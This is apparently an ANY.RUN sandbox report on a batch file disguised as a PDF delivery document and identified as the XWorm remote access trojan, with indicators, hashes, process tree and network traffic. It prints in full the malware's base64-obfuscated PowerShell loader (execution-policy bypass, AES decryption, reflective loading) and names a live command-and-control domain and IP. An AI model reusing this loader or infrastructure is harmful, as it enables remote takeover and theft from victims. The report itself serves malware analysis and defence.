File name:

awb_documents_delivery_23_03_2025_0000000-pdf.bat

Full analysis: https://app.any.run/tasks/8aa7dfb0-cc90-45d1-9daf-4ba710cd8c72
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: March 25, 2025, 06:36:46
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remote
xworm
susp-powershell
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (29384), with CRLF line terminators
MD5:

04910209F28F9BE58CA26C7F8F34D82F

SHA1:

F132E7A94FE1F8C2081B1CD1A70D7BF0320F87C0

SHA256:

8BE80C2C475E56E5CF4352B55D95D859D4816548052309AD41CFD01E86615BE7

SSDEEP:

3072:u4fpOIQ10NYLzolDW9z9R98fouyulP8HfHKN6cFOPr6JfmD6kF4CA4oBMzNzjMIY:BhOIQyWL0DW9z9R98fouyulP8HfH5AuK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5164)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 5720)

    • XWORM has been detected (SURICATA)

      • powershell.exe (PID: 5720)

    • XWORM has been detected (YARA)

      • powershell.exe (PID: 5720)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5164)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5164)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3304)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 3304)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5164)

    • Application launched itself

      • cmd.exe (PID: 3304)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 5720)

    • Connects to unusual port

      • powershell.exe (PID: 5720)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5720)

    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • cmd.exe (PID: 5164)
      • powershell.exe (PID: 5720)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 5720)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 5720)

    • Checks proxy server information

      • slui.exe (PID: 5548)

    • Reads the software policy settings

      • slui.exe (PID: 5548)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs #XWORM powershell.exe svchost.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3304C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\awb_documents_delivery_23_03_2025_0000000-pdf.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
4608\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5164C:\WINDOWS\system32\cmd.exe /K "C:\Users\admin\Desktop\awb_documents_delivery_23_03_2025_0000000-pdf.bat" C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
5548C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5640\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5720"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2VyY2VtcXVOYW1lIGNlbXF1PSAkZW5jZW1xdXY6VVNFY2VtcXVSTkFNRWNlbXF1OyRvem5jZW1xdXN6ID0gY2VtcXUiQzpcVWNlbXF1c2Vyc1xjZW1xdSR1c2VyY2VtcXVOYW1lXGNlbXF1ZHdtLmJjZW1xdWF0IjtpY2VtcXVmIChUZWNlbXF1c3QtUGFjZW1xdXRoICRvY2VtcXV6bnN6KWNlbXF1IHsgICBjZW1xdSBXcml0Y2VtcXVlLUhvc2NlbXF1dCAiQmFjZW1xdXRjaCBmY2VtcXVpbGUgZmNlbXF1b3VuZDpjZW1xdSAkb3puY2VtcXVzeiIgLWNlbXF1Rm9yZWdjZW1xdXJvdW5kY2VtcXVDb2xvcmNlbXF1IEN5YW5jZW1xdTsgICAgY2VtcXUkZmlsZWNlbXF1TGluZXNjZW1xdSA9IFtTY2VtcXV5c3RlbWNlbXF1LklPLkZjZW1xdWlsZV06Y2VtcXU6UmVhZGNlbXF1QWxsTGljZW1xdW5lcygkY2VtcXVvem5zemNlbXF1LCBbU3ljZW1xdXN0ZW0uY2VtcXVUZXh0LmNlbXF1RW5jb2RjZW1xdWluZ106Y2VtcXU6VVRGOGNlbXF1KTsgICBjZW1xdSBmb3JlY2VtcXVhY2ggKGNlbXF1JGxpbmVjZW1xdSBpbiAkY2VtcXVmaWxlTGNlbXF1aW5lcyljZW1xdSB7ICAgY2VtcXUgICAgIGNlbXF1aWYgKCRjZW1xdWxpbmUgY2VtcXUtbWF0Y2NlbXF1aCAnXjpjZW1xdTo6ID8oY2VtcXUuKykkJ2NlbXF1KSB7ICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1V3JpdGVjZW1xdS1Ib3N0Y2VtcXUgIkluamNlbXF1ZWN0aW9jZW1xdW4gY29kY2VtcXVlIGRldGNlbXF1ZWN0ZWRjZW1xdSBpbiB0Y2VtcXVoZSBiYWNlbXF1dGNoIGZjZW1xdWlsZS4iY2VtcXUgLUZvcmNlbXF1ZWdyb3VjZW1xdW5kQ29sY2VtcXVvciBDeWNlbXF1YW47ICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1dHJ5IHtjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1ICAgICBjZW1xdSAkZGVjY2VtcXVvZGVkQmNlbXF1eXRlcyBjZW1xdT0gW1N5Y2VtcXVzdGVtLmNlbXF1Q29udmVjZW1xdXJ0XTo6Y2VtcXVGcm9tQmNlbXF1YXNlNjRjZW1xdVN0cmluY2VtcXVnKCRtYWNlbXF1dGNoZXNjZW1xdVsxXS5UY2VtcXVyaW0oKWNlbXF1KTsgICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1ICAgJGljZW1xdW5qZWN0Y2VtcXVpb25Db2NlbXF1ZGUgPSBjZW1xdVtTeXN0Y2VtcXVlbS5UZWNlbXF1eHQuRW5jZW1xdWNvZGluY2VtcXVnXTo6VWNlbXF1bmljb2RjZW1xdWUuR2V0Y2VtcXVTdHJpbmNlbXF1ZygkZGVjZW1xdWNvZGVkY2VtcXVCeXRlc2NlbXF1KTsgICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1ICAgV3JjZW1xdWl0ZS1IY2VtcXVvc3QgImNlbXF1SW5qZWNjZW1xdXRpb24gY2VtcXVjb2RlIGNlbXF1ZGVjb2RjZW1xdWVkIHN1Y2VtcXVjY2Vzc2NlbXF1ZnVsbHljZW1xdS4iIC1GY2VtcXVvcmVncmNlbXF1b3VuZENjZW1xdW9sb3IgY2VtcXVHcmVlbmNlbXF1OyAgICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1ICBXcmljZW1xdXRlLUhvY2VtcXVzdCAiRWNlbXF1eGVjdXRjZW1xdWluZyBpY2VtcXVuamVjdGNlbXF1aW9uIGNjZW1xdW9kZS4uY2VtcXUuIiAtRmNlbXF1b3JlZ3JjZW1xdW91bmRDY2VtcXVvbG9yIGNlbXF1WWVsbG9jZW1xdXc7ICAgY2VtcXUgICAgIGNlbXF1ICAgICBjZW1xdSAgIEluY2VtcXV2b2tlLWNlbXF1RXhwcmVjZW1xdXNzaW9uY2VtcXUgJGluamNlbXF1ZWN0aW9jZW1xdW5Db2RlY2VtcXU7ICAgIGNlbXF1ICAgICBjZW1xdSAgICAgY2VtcXUgIGJyZWNlbXF1YWs7ICBjZW1xdSAgICAgY2VtcXUgICAgIGNlbXF1fSBjYXRjZW1xdWNoIHsgY2VtcXUgICAgIGNlbXF1ICAgICBjZW1xdSAgICAgY2VtcXVXcml0ZWNlbXF1LUhvc3RjZW1xdSAiRXJyY2VtcXVvciBkdWNlbXF1cmluZyBjZW1xdWRlY29kY2VtcXVpbmcgb2NlbXF1ciBleGVjZW1xdWN1dGluY2VtcXVnIGluamNlbXF1ZWN0aW9jZW1xdW4gY29kY2VtcXVlOiAkX2NlbXF1IiAtRm9jZW1xdXJlZ3JvY2VtcXV1bmRDb2NlbXF1bG9yIFJjZW1xdWVkOyAgY2VtcXUgICAgIGNlbXF1ICAgICBjZW1xdX07ICAgY2VtcXUgICAgIGNlbXF1fTsgICBjZW1xdSB9O30gY2VtcXVlbHNlIGNlbXF1eyAgICBjZW1xdSAgV3JpY2VtcXV0ZS1Ib2NlbXF1c3QgIlNjZW1xdXlzdGVtY2VtcXUgRXJyb2NlbXF1cjogQmFjZW1xdXRjaCBmY2VtcXVpbGUgbmNlbXF1b3QgZm9jZW1xdXVuZDogY2VtcXUkb3puc2NlbXF1eiIgLUZjZW1xdW9yZWdyY2VtcXVvdW5kQ2NlbXF1b2xvciBjZW1xdVJlZDsgY2VtcXUgICBleGNlbXF1aXQ7fTtjZW1xdWZ1bmN0Y2VtcXVpb24gY2NlbXF1dnR6ayhjZW1xdSRwYXJhY2VtcXVtX3ZhcmNlbXF1KXsJJGFjZW1xdWVzX3ZhY2VtcXVyPVtTeWNlbXF1c3RlbS5jZW1xdVNlY3VyY2VtcXVpdHkuQ2NlbXF1cnlwdG9jZW1xdWdyYXBoY2VtcXV5LkFlc2NlbXF1XTo6Q3JjZW1xdWVhdGUoY2VtcXUpOwkkYWNlbXF1ZXNfdmFjZW1xdXIuTW9kY2VtcXVlPVtTeWNlbXF1c3RlbS5jZW1xdVNlY3VyY2VtcXVpdHkuQ2NlbXF1cnlwdG9jZW1xdWdyYXBoY2VtcXV5LkNpcGNlbXF1aGVyTW9jZW1xdWRlXTo6Y2VtcXVDQkM7CWNlbXF1JGFlc19jZW1xdXZhci5QY2VtcXVhZGRpbmNlbXF1Zz1bU3ljZW1xdXN0ZW0uY2VtcXVTZWN1cmNlbXF1aXR5LkNjZW1xdXJ5cHRvY2VtcXVncmFwaGNlbXF1eS5QYWRjZW1xdWRpbmdNY2VtcXVvZGVdOmNlbXF1OlBLQ1NjZW1xdTc7CSRhY2VtcXVlc192YWNlbXF1ci5LZXljZW1xdT1bU3lzY2VtcXV0ZW0uQ2NlbXF1b252ZXJjZW1xdXRdOjpGY2VtcXVyb21CYWNlbXF1c2U2NFNjZW1xdXRyaW5nY2VtcXUoJ3F2bGNlbXF1QUxZR0tjZW1xdXZYM1E3Y2VtcXVUMmhYT2NlbXF1ZVV2Z09jZW1xdTlTTlNQY2VtcXUzRUVueWNlbXF1LzBpcDJjZW1xdXY5WDlZY2VtcXU9Jyk7CWNlbXF1JGFlc19jZW1xdXZhci5JY2VtcXVWPVtTeWNlbXF1c3RlbS5jZW1xdUNvbnZlY2VtcXVydF06OmNlbXF1RnJvbUJjZW1xdWFzZTY0Y2VtcXVTdHJpbmNlbXF1ZygnL3pjZW1xdWFlekZvY2VtcXVUSklZRGNlbXF1eFFxRlNjZW1xdTBvNld3Y2VtcXU9PScpO2NlbXF1CSRkZWNjZW1xdXJ5cHRvY2VtcXVyX3ZhcmNlbXF1PSRhZXNjZW1xdV92YXIuY2VtcXVDcmVhdGNlbXF1ZURlY3JjZW1xdXlwdG9yY2VtcXUoKTsJJGNlbXF1cmV0dXJjZW1xdW5fdmFyY2VtcXU9JGRlY2NlbXF1cnlwdG9jZW1xdXJfdmFyY2VtcXUuVHJhbmNlbXF1c2Zvcm1jZW1xdUZpbmFsY2VtcXVCbG9ja2NlbXF1KCRwYXJjZW1xdWFtX3ZhY2VtcXVyLCAwLGNlbXF1ICRwYXJjZW1xdWFtX3ZhY2VtcXVyLkxlbmNlbXF1Z3RoKTtjZW1xdQkkZGVjY2VtcXVyeXB0b2NlbXF1cl92YXJjZW1xdS5EaXNwY2VtcXVvc2UoKWNlbXF1OwkkYWVjZW1xdXNfdmFyY2VtcXUuRGlzcGNlbXF1b3NlKCljZW1xdTsJJHJlY2VtcXV0dXJuX2NlbXF1dmFyO31jZW1xdWZ1bmN0Y2VtcXVpb24gaWNlbXF1YWxhdChjZW1xdSRwYXJhY2VtcXVtX3ZhcmNlbXF1KXsJJG9jZW1xdWhlZm09Y2VtcXVOZXctT2NlbXF1YmplY3RjZW1xdSBTeXN0Y2VtcXVlbS5JT2NlbXF1Lk1lbW9jZW1xdXJ5U3RyY2VtcXVlYW0oLGNlbXF1JHBhcmFjZW1xdW1fdmFyY2VtcXUpOwkkZWNlbXF1b25pbz1jZW1xdU5ldy1PY2VtcXViamVjdGNlbXF1IFN5c3RjZW1xdWVtLklPY2VtcXUuTWVtb2NlbXF1cnlTdHJjZW1xdWVhbTsJY2VtcXUkanRqc2NlbXF1dT1OZXdjZW1xdS1PYmplY2VtcXVjdCBTeWNlbXF1c3RlbS5jZW1xdUlPLkNvY2VtcXVtcHJlc2NlbXF1c2lvbi5jZW1xdUdaaXBTY2VtcXV0cmVhbWNlbXF1KCRvaGVjZW1xdWZtLCBbY2VtcXVJTy5Db2NlbXF1bXByZXNjZW1xdXNpb24uY2VtcXVDb21wcmNlbXF1ZXNzaW9jZW1xdW5Nb2RlY2VtcXVdOjpEZWNlbXF1Y29tcHJjZW1xdWVzcyk7Y2VtcXUJJGp0amNlbXF1c3UuQ29jZW1xdXB5VG8oY2VtcXUkZW9uaWNlbXF1byk7CSRjZW1xdWp0anN1Y2VtcXUuRGlzcGNlbXF1b3NlKCljZW1xdTsJJG9oY2VtcXVlZm0uRGNlbXF1aXNwb3NjZW1xdWUoKTsJY2VtcXUkZW9uaWNlbXF1by5EaXNjZW1xdXBvc2UoY2VtcXUpOwkkZWNlbXF1b25pby5jZW1xdVRvQXJyY2VtcXVheSgpO2NlbXF1fWZ1bmNjZW1xdXRpb24gY2VtcXVzZ2ZneGNlbXF1KCRwYXJjZW1xdWFtX3ZhY2VtcXVyLCRwYWNlbXF1cmFtMl9jZW1xdXZhcil7Y2VtcXUJJGV2YmNlbXF1d2c9W1NjZW1xdXlzdGVtY2VtcXUuUmVmbGNlbXF1ZWN0aW9jZW1xdW4uQXNzY2VtcXVlbWJseWNlbXF1XTo6KCdjZW1xdWRhb0wnY2VtcXVbLTEuLmNlbXF1LTRdIC1jZW1xdWpvaW4gY2VtcXUnJykoW2NlbXF1Ynl0ZVtjZW1xdV1dJHBhY2VtcXVyYW1fdmNlbXF1YXIpOwljZW1xdSRueGxlY2VtcXV6PSRldmNlbXF1YndnLkVjZW1xdW50cnlQY2VtcXVvaW50O2NlbXF1CSRueGxjZW1xdWV6LkluY2VtcXV2b2tlKGNlbXF1JG51bGxjZW1xdSwgJHBhY2VtcXVyYW0yX2NlbXF1dmFyKTtjZW1xdX0kaG9zY2VtcXV0LlVJLmNlbXF1UmF3VUljZW1xdS5XaW5kY2VtcXVvd1RpdGNlbXF1bGUgPSBjZW1xdSRvem5zY2VtcXV6OyRnaGNlbXF1YnZtPVtjZW1xdVN5c3RlY2VtcXVtLklPLmNlbXF1RmlsZV1jZW1xdTo6KCd0Y2VtcXV4ZVRsbGNlbXF1QWRhZVJjZW1xdSdbLTEuY2VtcXUuLTExXWNlbXF1IC1qb2ljZW1xdW4gJycpY2VtcXUoJG96bmNlbXF1c3opLlNjZW1xdXBsaXQoY2VtcXVbRW52aWNlbXF1cm9ubWVjZW1xdW50XTo6Y2VtcXVOZXdMaWNlbXF1bmUpO2ZjZW1xdW9yZWFjY2VtcXVoICgkYmNlbXF1aXVkeSBjZW1xdWluICRnY2VtcXVoYnZtKWNlbXF1IHsJaWZjZW1xdSAoJGJpY2VtcXV1ZHkuU2NlbXF1dGFydHNjZW1xdVdpdGgoY2VtcXUnOjogJ2NlbXF1KSkJewljZW1xdQkkenN0Y2VtcXVqZT0kYmNlbXF1aXVkeS5jZW1xdVN1YnN0Y2VtcXVyaW5nKGNlbXF1Myk7CQljZW1xdWJyZWFrY2VtcXU7CX19JGNlbXF1b3F5bGFjZW1xdT1bc3RyY2VtcXVpbmdbXWNlbXF1XSR6c3RjZW1xdWplLlNwY2VtcXVsaXQoJ2NlbXF1XCcpOyRjZW1xdXZwemtxY2VtcXU9aWFsYWNlbXF1dCAoY3ZjZW1xdXR6ayAoY2VtcXVbQ29udmNlbXF1ZXJ0XTpjZW1xdTpGcm9tY2VtcXVCYXNlNmNlbXF1NFN0cmljZW1xdW5nKCRvY2VtcXVxeWxhW2NlbXF1MF0pKSljZW1xdTskanhuY2VtcXV0Zz1pYWNlbXF1bGF0IChjZW1xdWN2dHprY2VtcXUgKFtDb2NlbXF1bnZlcnRjZW1xdV06OkZyY2VtcXVvbUJhc2NlbXF1ZTY0U3RjZW1xdXJpbmcoY2VtcXUkb3F5bGNlbXF1YVsxXSljZW1xdSkpO3NnY2VtcXVmZ3ggJGNlbXF1dnB6a3FjZW1xdSAkbnVsY2VtcXVsO3NnZmNlbXF1Z3ggJGpjZW1xdXhudGcgY2VtcXUoLFtzdGNlbXF1cmluZ1tjZW1xdV1dICgnY2VtcXUlKicpKWNlbXF1Ow0KJ0ANCg0KJGRlb2JmdXNjYXRlZCA9ICRzY3JpcHRDb250ZW50IC1yZXBsYWNlICdjZW1xdScsICcnDQoNCkludm9rZS1FeHByZXNzaW9uICRkZW9iZnVzY2F0ZWQNCg==')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
8 716
Read events
8 716
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
5720powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ueyj5yem.d00.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164cmd.exeC:\Users\admin\dwm.battext
MD5:04910209F28F9BE58CA26C7F8F34D82F
SHA256:8BE80C2C475E56E5CF4352B55D95D859D4816548052309AD41CFD01E86615BE7
5720powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ktwe4rxi.sbw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
22
DNS requests
7
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
POST
500
20.83.72.98:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
unknown
xml
512 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
51.124.78.146:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5720
powershell.exe
206.123.152.107:3911
freeetradingzone.duckdns.org
CR
malicious
7000
slui.exe
20.83.72.98:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
whitelisted
google.com
  • 142.250.184.238
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.20
  • 23.216.77.36
whitelisted
freeetradingzone.duckdns.org
  • 206.123.152.107
malicious
activation-v2.sls.microsoft.com
  • 20.83.72.98
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
5720
powershell.exe
Malware Command and Control Activity Detected
REMOTE [ANY.RUN] Xworm TCP Packet
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
awb_documents_delivery_23_03_2025_0000000-pdf.bat